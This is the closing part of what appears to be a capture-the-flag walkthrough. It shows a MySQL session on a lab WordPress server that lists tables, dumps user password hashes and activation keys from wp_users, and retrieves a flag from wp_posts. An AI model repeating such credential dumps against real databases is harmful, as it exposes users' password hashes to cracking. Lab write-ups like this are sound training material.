Server version: 5.7.25-0ubuntu0.16.04.2 (Ubuntu)Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> show databases;
+---------------------+
| Database |
+---------------------+
| information_schema |
| footprintsonthemoon |
+---------------------+
2 rows in set (0.00 sec)mysql> use footprintsonthemoon;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> show tables;
+--------------------------------+
| Tables_in_footprintsonthemoon |
+--------------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_reflex_gallery |
| wp_reflex_gallery_images |
| wp_responsive_thumbnail_slider |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+--------------------------------+
15 rows in set (0.00 sec)mysql> select * from wp_users;
+----+---------------------+------------------------------------+---------------------+-----------------------------------+----------+---------------------+-----------------------------------------------+-------------+---------------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+---------------------+------------------------------------+---------------------+-----------------------------------+----------+---------------------+-----------------------------------------------+-------------+---------------------+
| 1 | footprintsonthemoon | $P$BFLeWWEe.4pVHfJB6s6P6.0c6nYctc/ | footprintsonthemoon | footprintsonthemoon@localhost.com | | 2020-03-04 13:20:41 | | 0 | footprintsonthemoon |
| 2 | kripke | $P$BDKbtgEvH7gYy.WN/yHpgXCuxDPxRz/ | kripke | kripke@kripke.com | | 2020-03-04 13:44:57 | 1583329498:$P$B/6Ncexoc9g3tJOggQJvo2/npr5WHw0 | 0 | kripke |
| 3 | stuart | $P$BpHBwNm3fHTK28WUvZThgDmIJkmZrY/ | stuart | stuart@stuart.com | | 2020-03-04 13:48:30 | 1583329711:$P$BJbz3KB.OSQUCk/cZjlGFNrXAxJe7B1 | 0 | stuart |
+----+---------------------+------------------------------------+---------------------+-----------------------------------+----------+---------------------+-----------------------------------------------+-------------+---------------------+
3 rows in set (0.00 sec)mysql> select * from wp_posts;
....<!-- wp:paragraph -->
<p>FLAG-raz{40d17a74e28a62eac2df19e206f0987c}</p>
<!-- /wp:paragraph --> | Secret notes | | inherit | closed | closed | | 30-revision-v1 | | | 2020-03-04 15:04:50 | 2020-03-04 15:04:50 | | 30 | http://192.168.1.105/music/wordpress/index.php/2020/03/04/30-revision-v1/ | 0 | revision | | 0 |
....
26 rows in set (0.00 sec)mysql>
FLAG-raj{40d17a74e28a62eac2df19e206f0987c}
Before You Go
Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! & Feedback is always welcome! 🙏
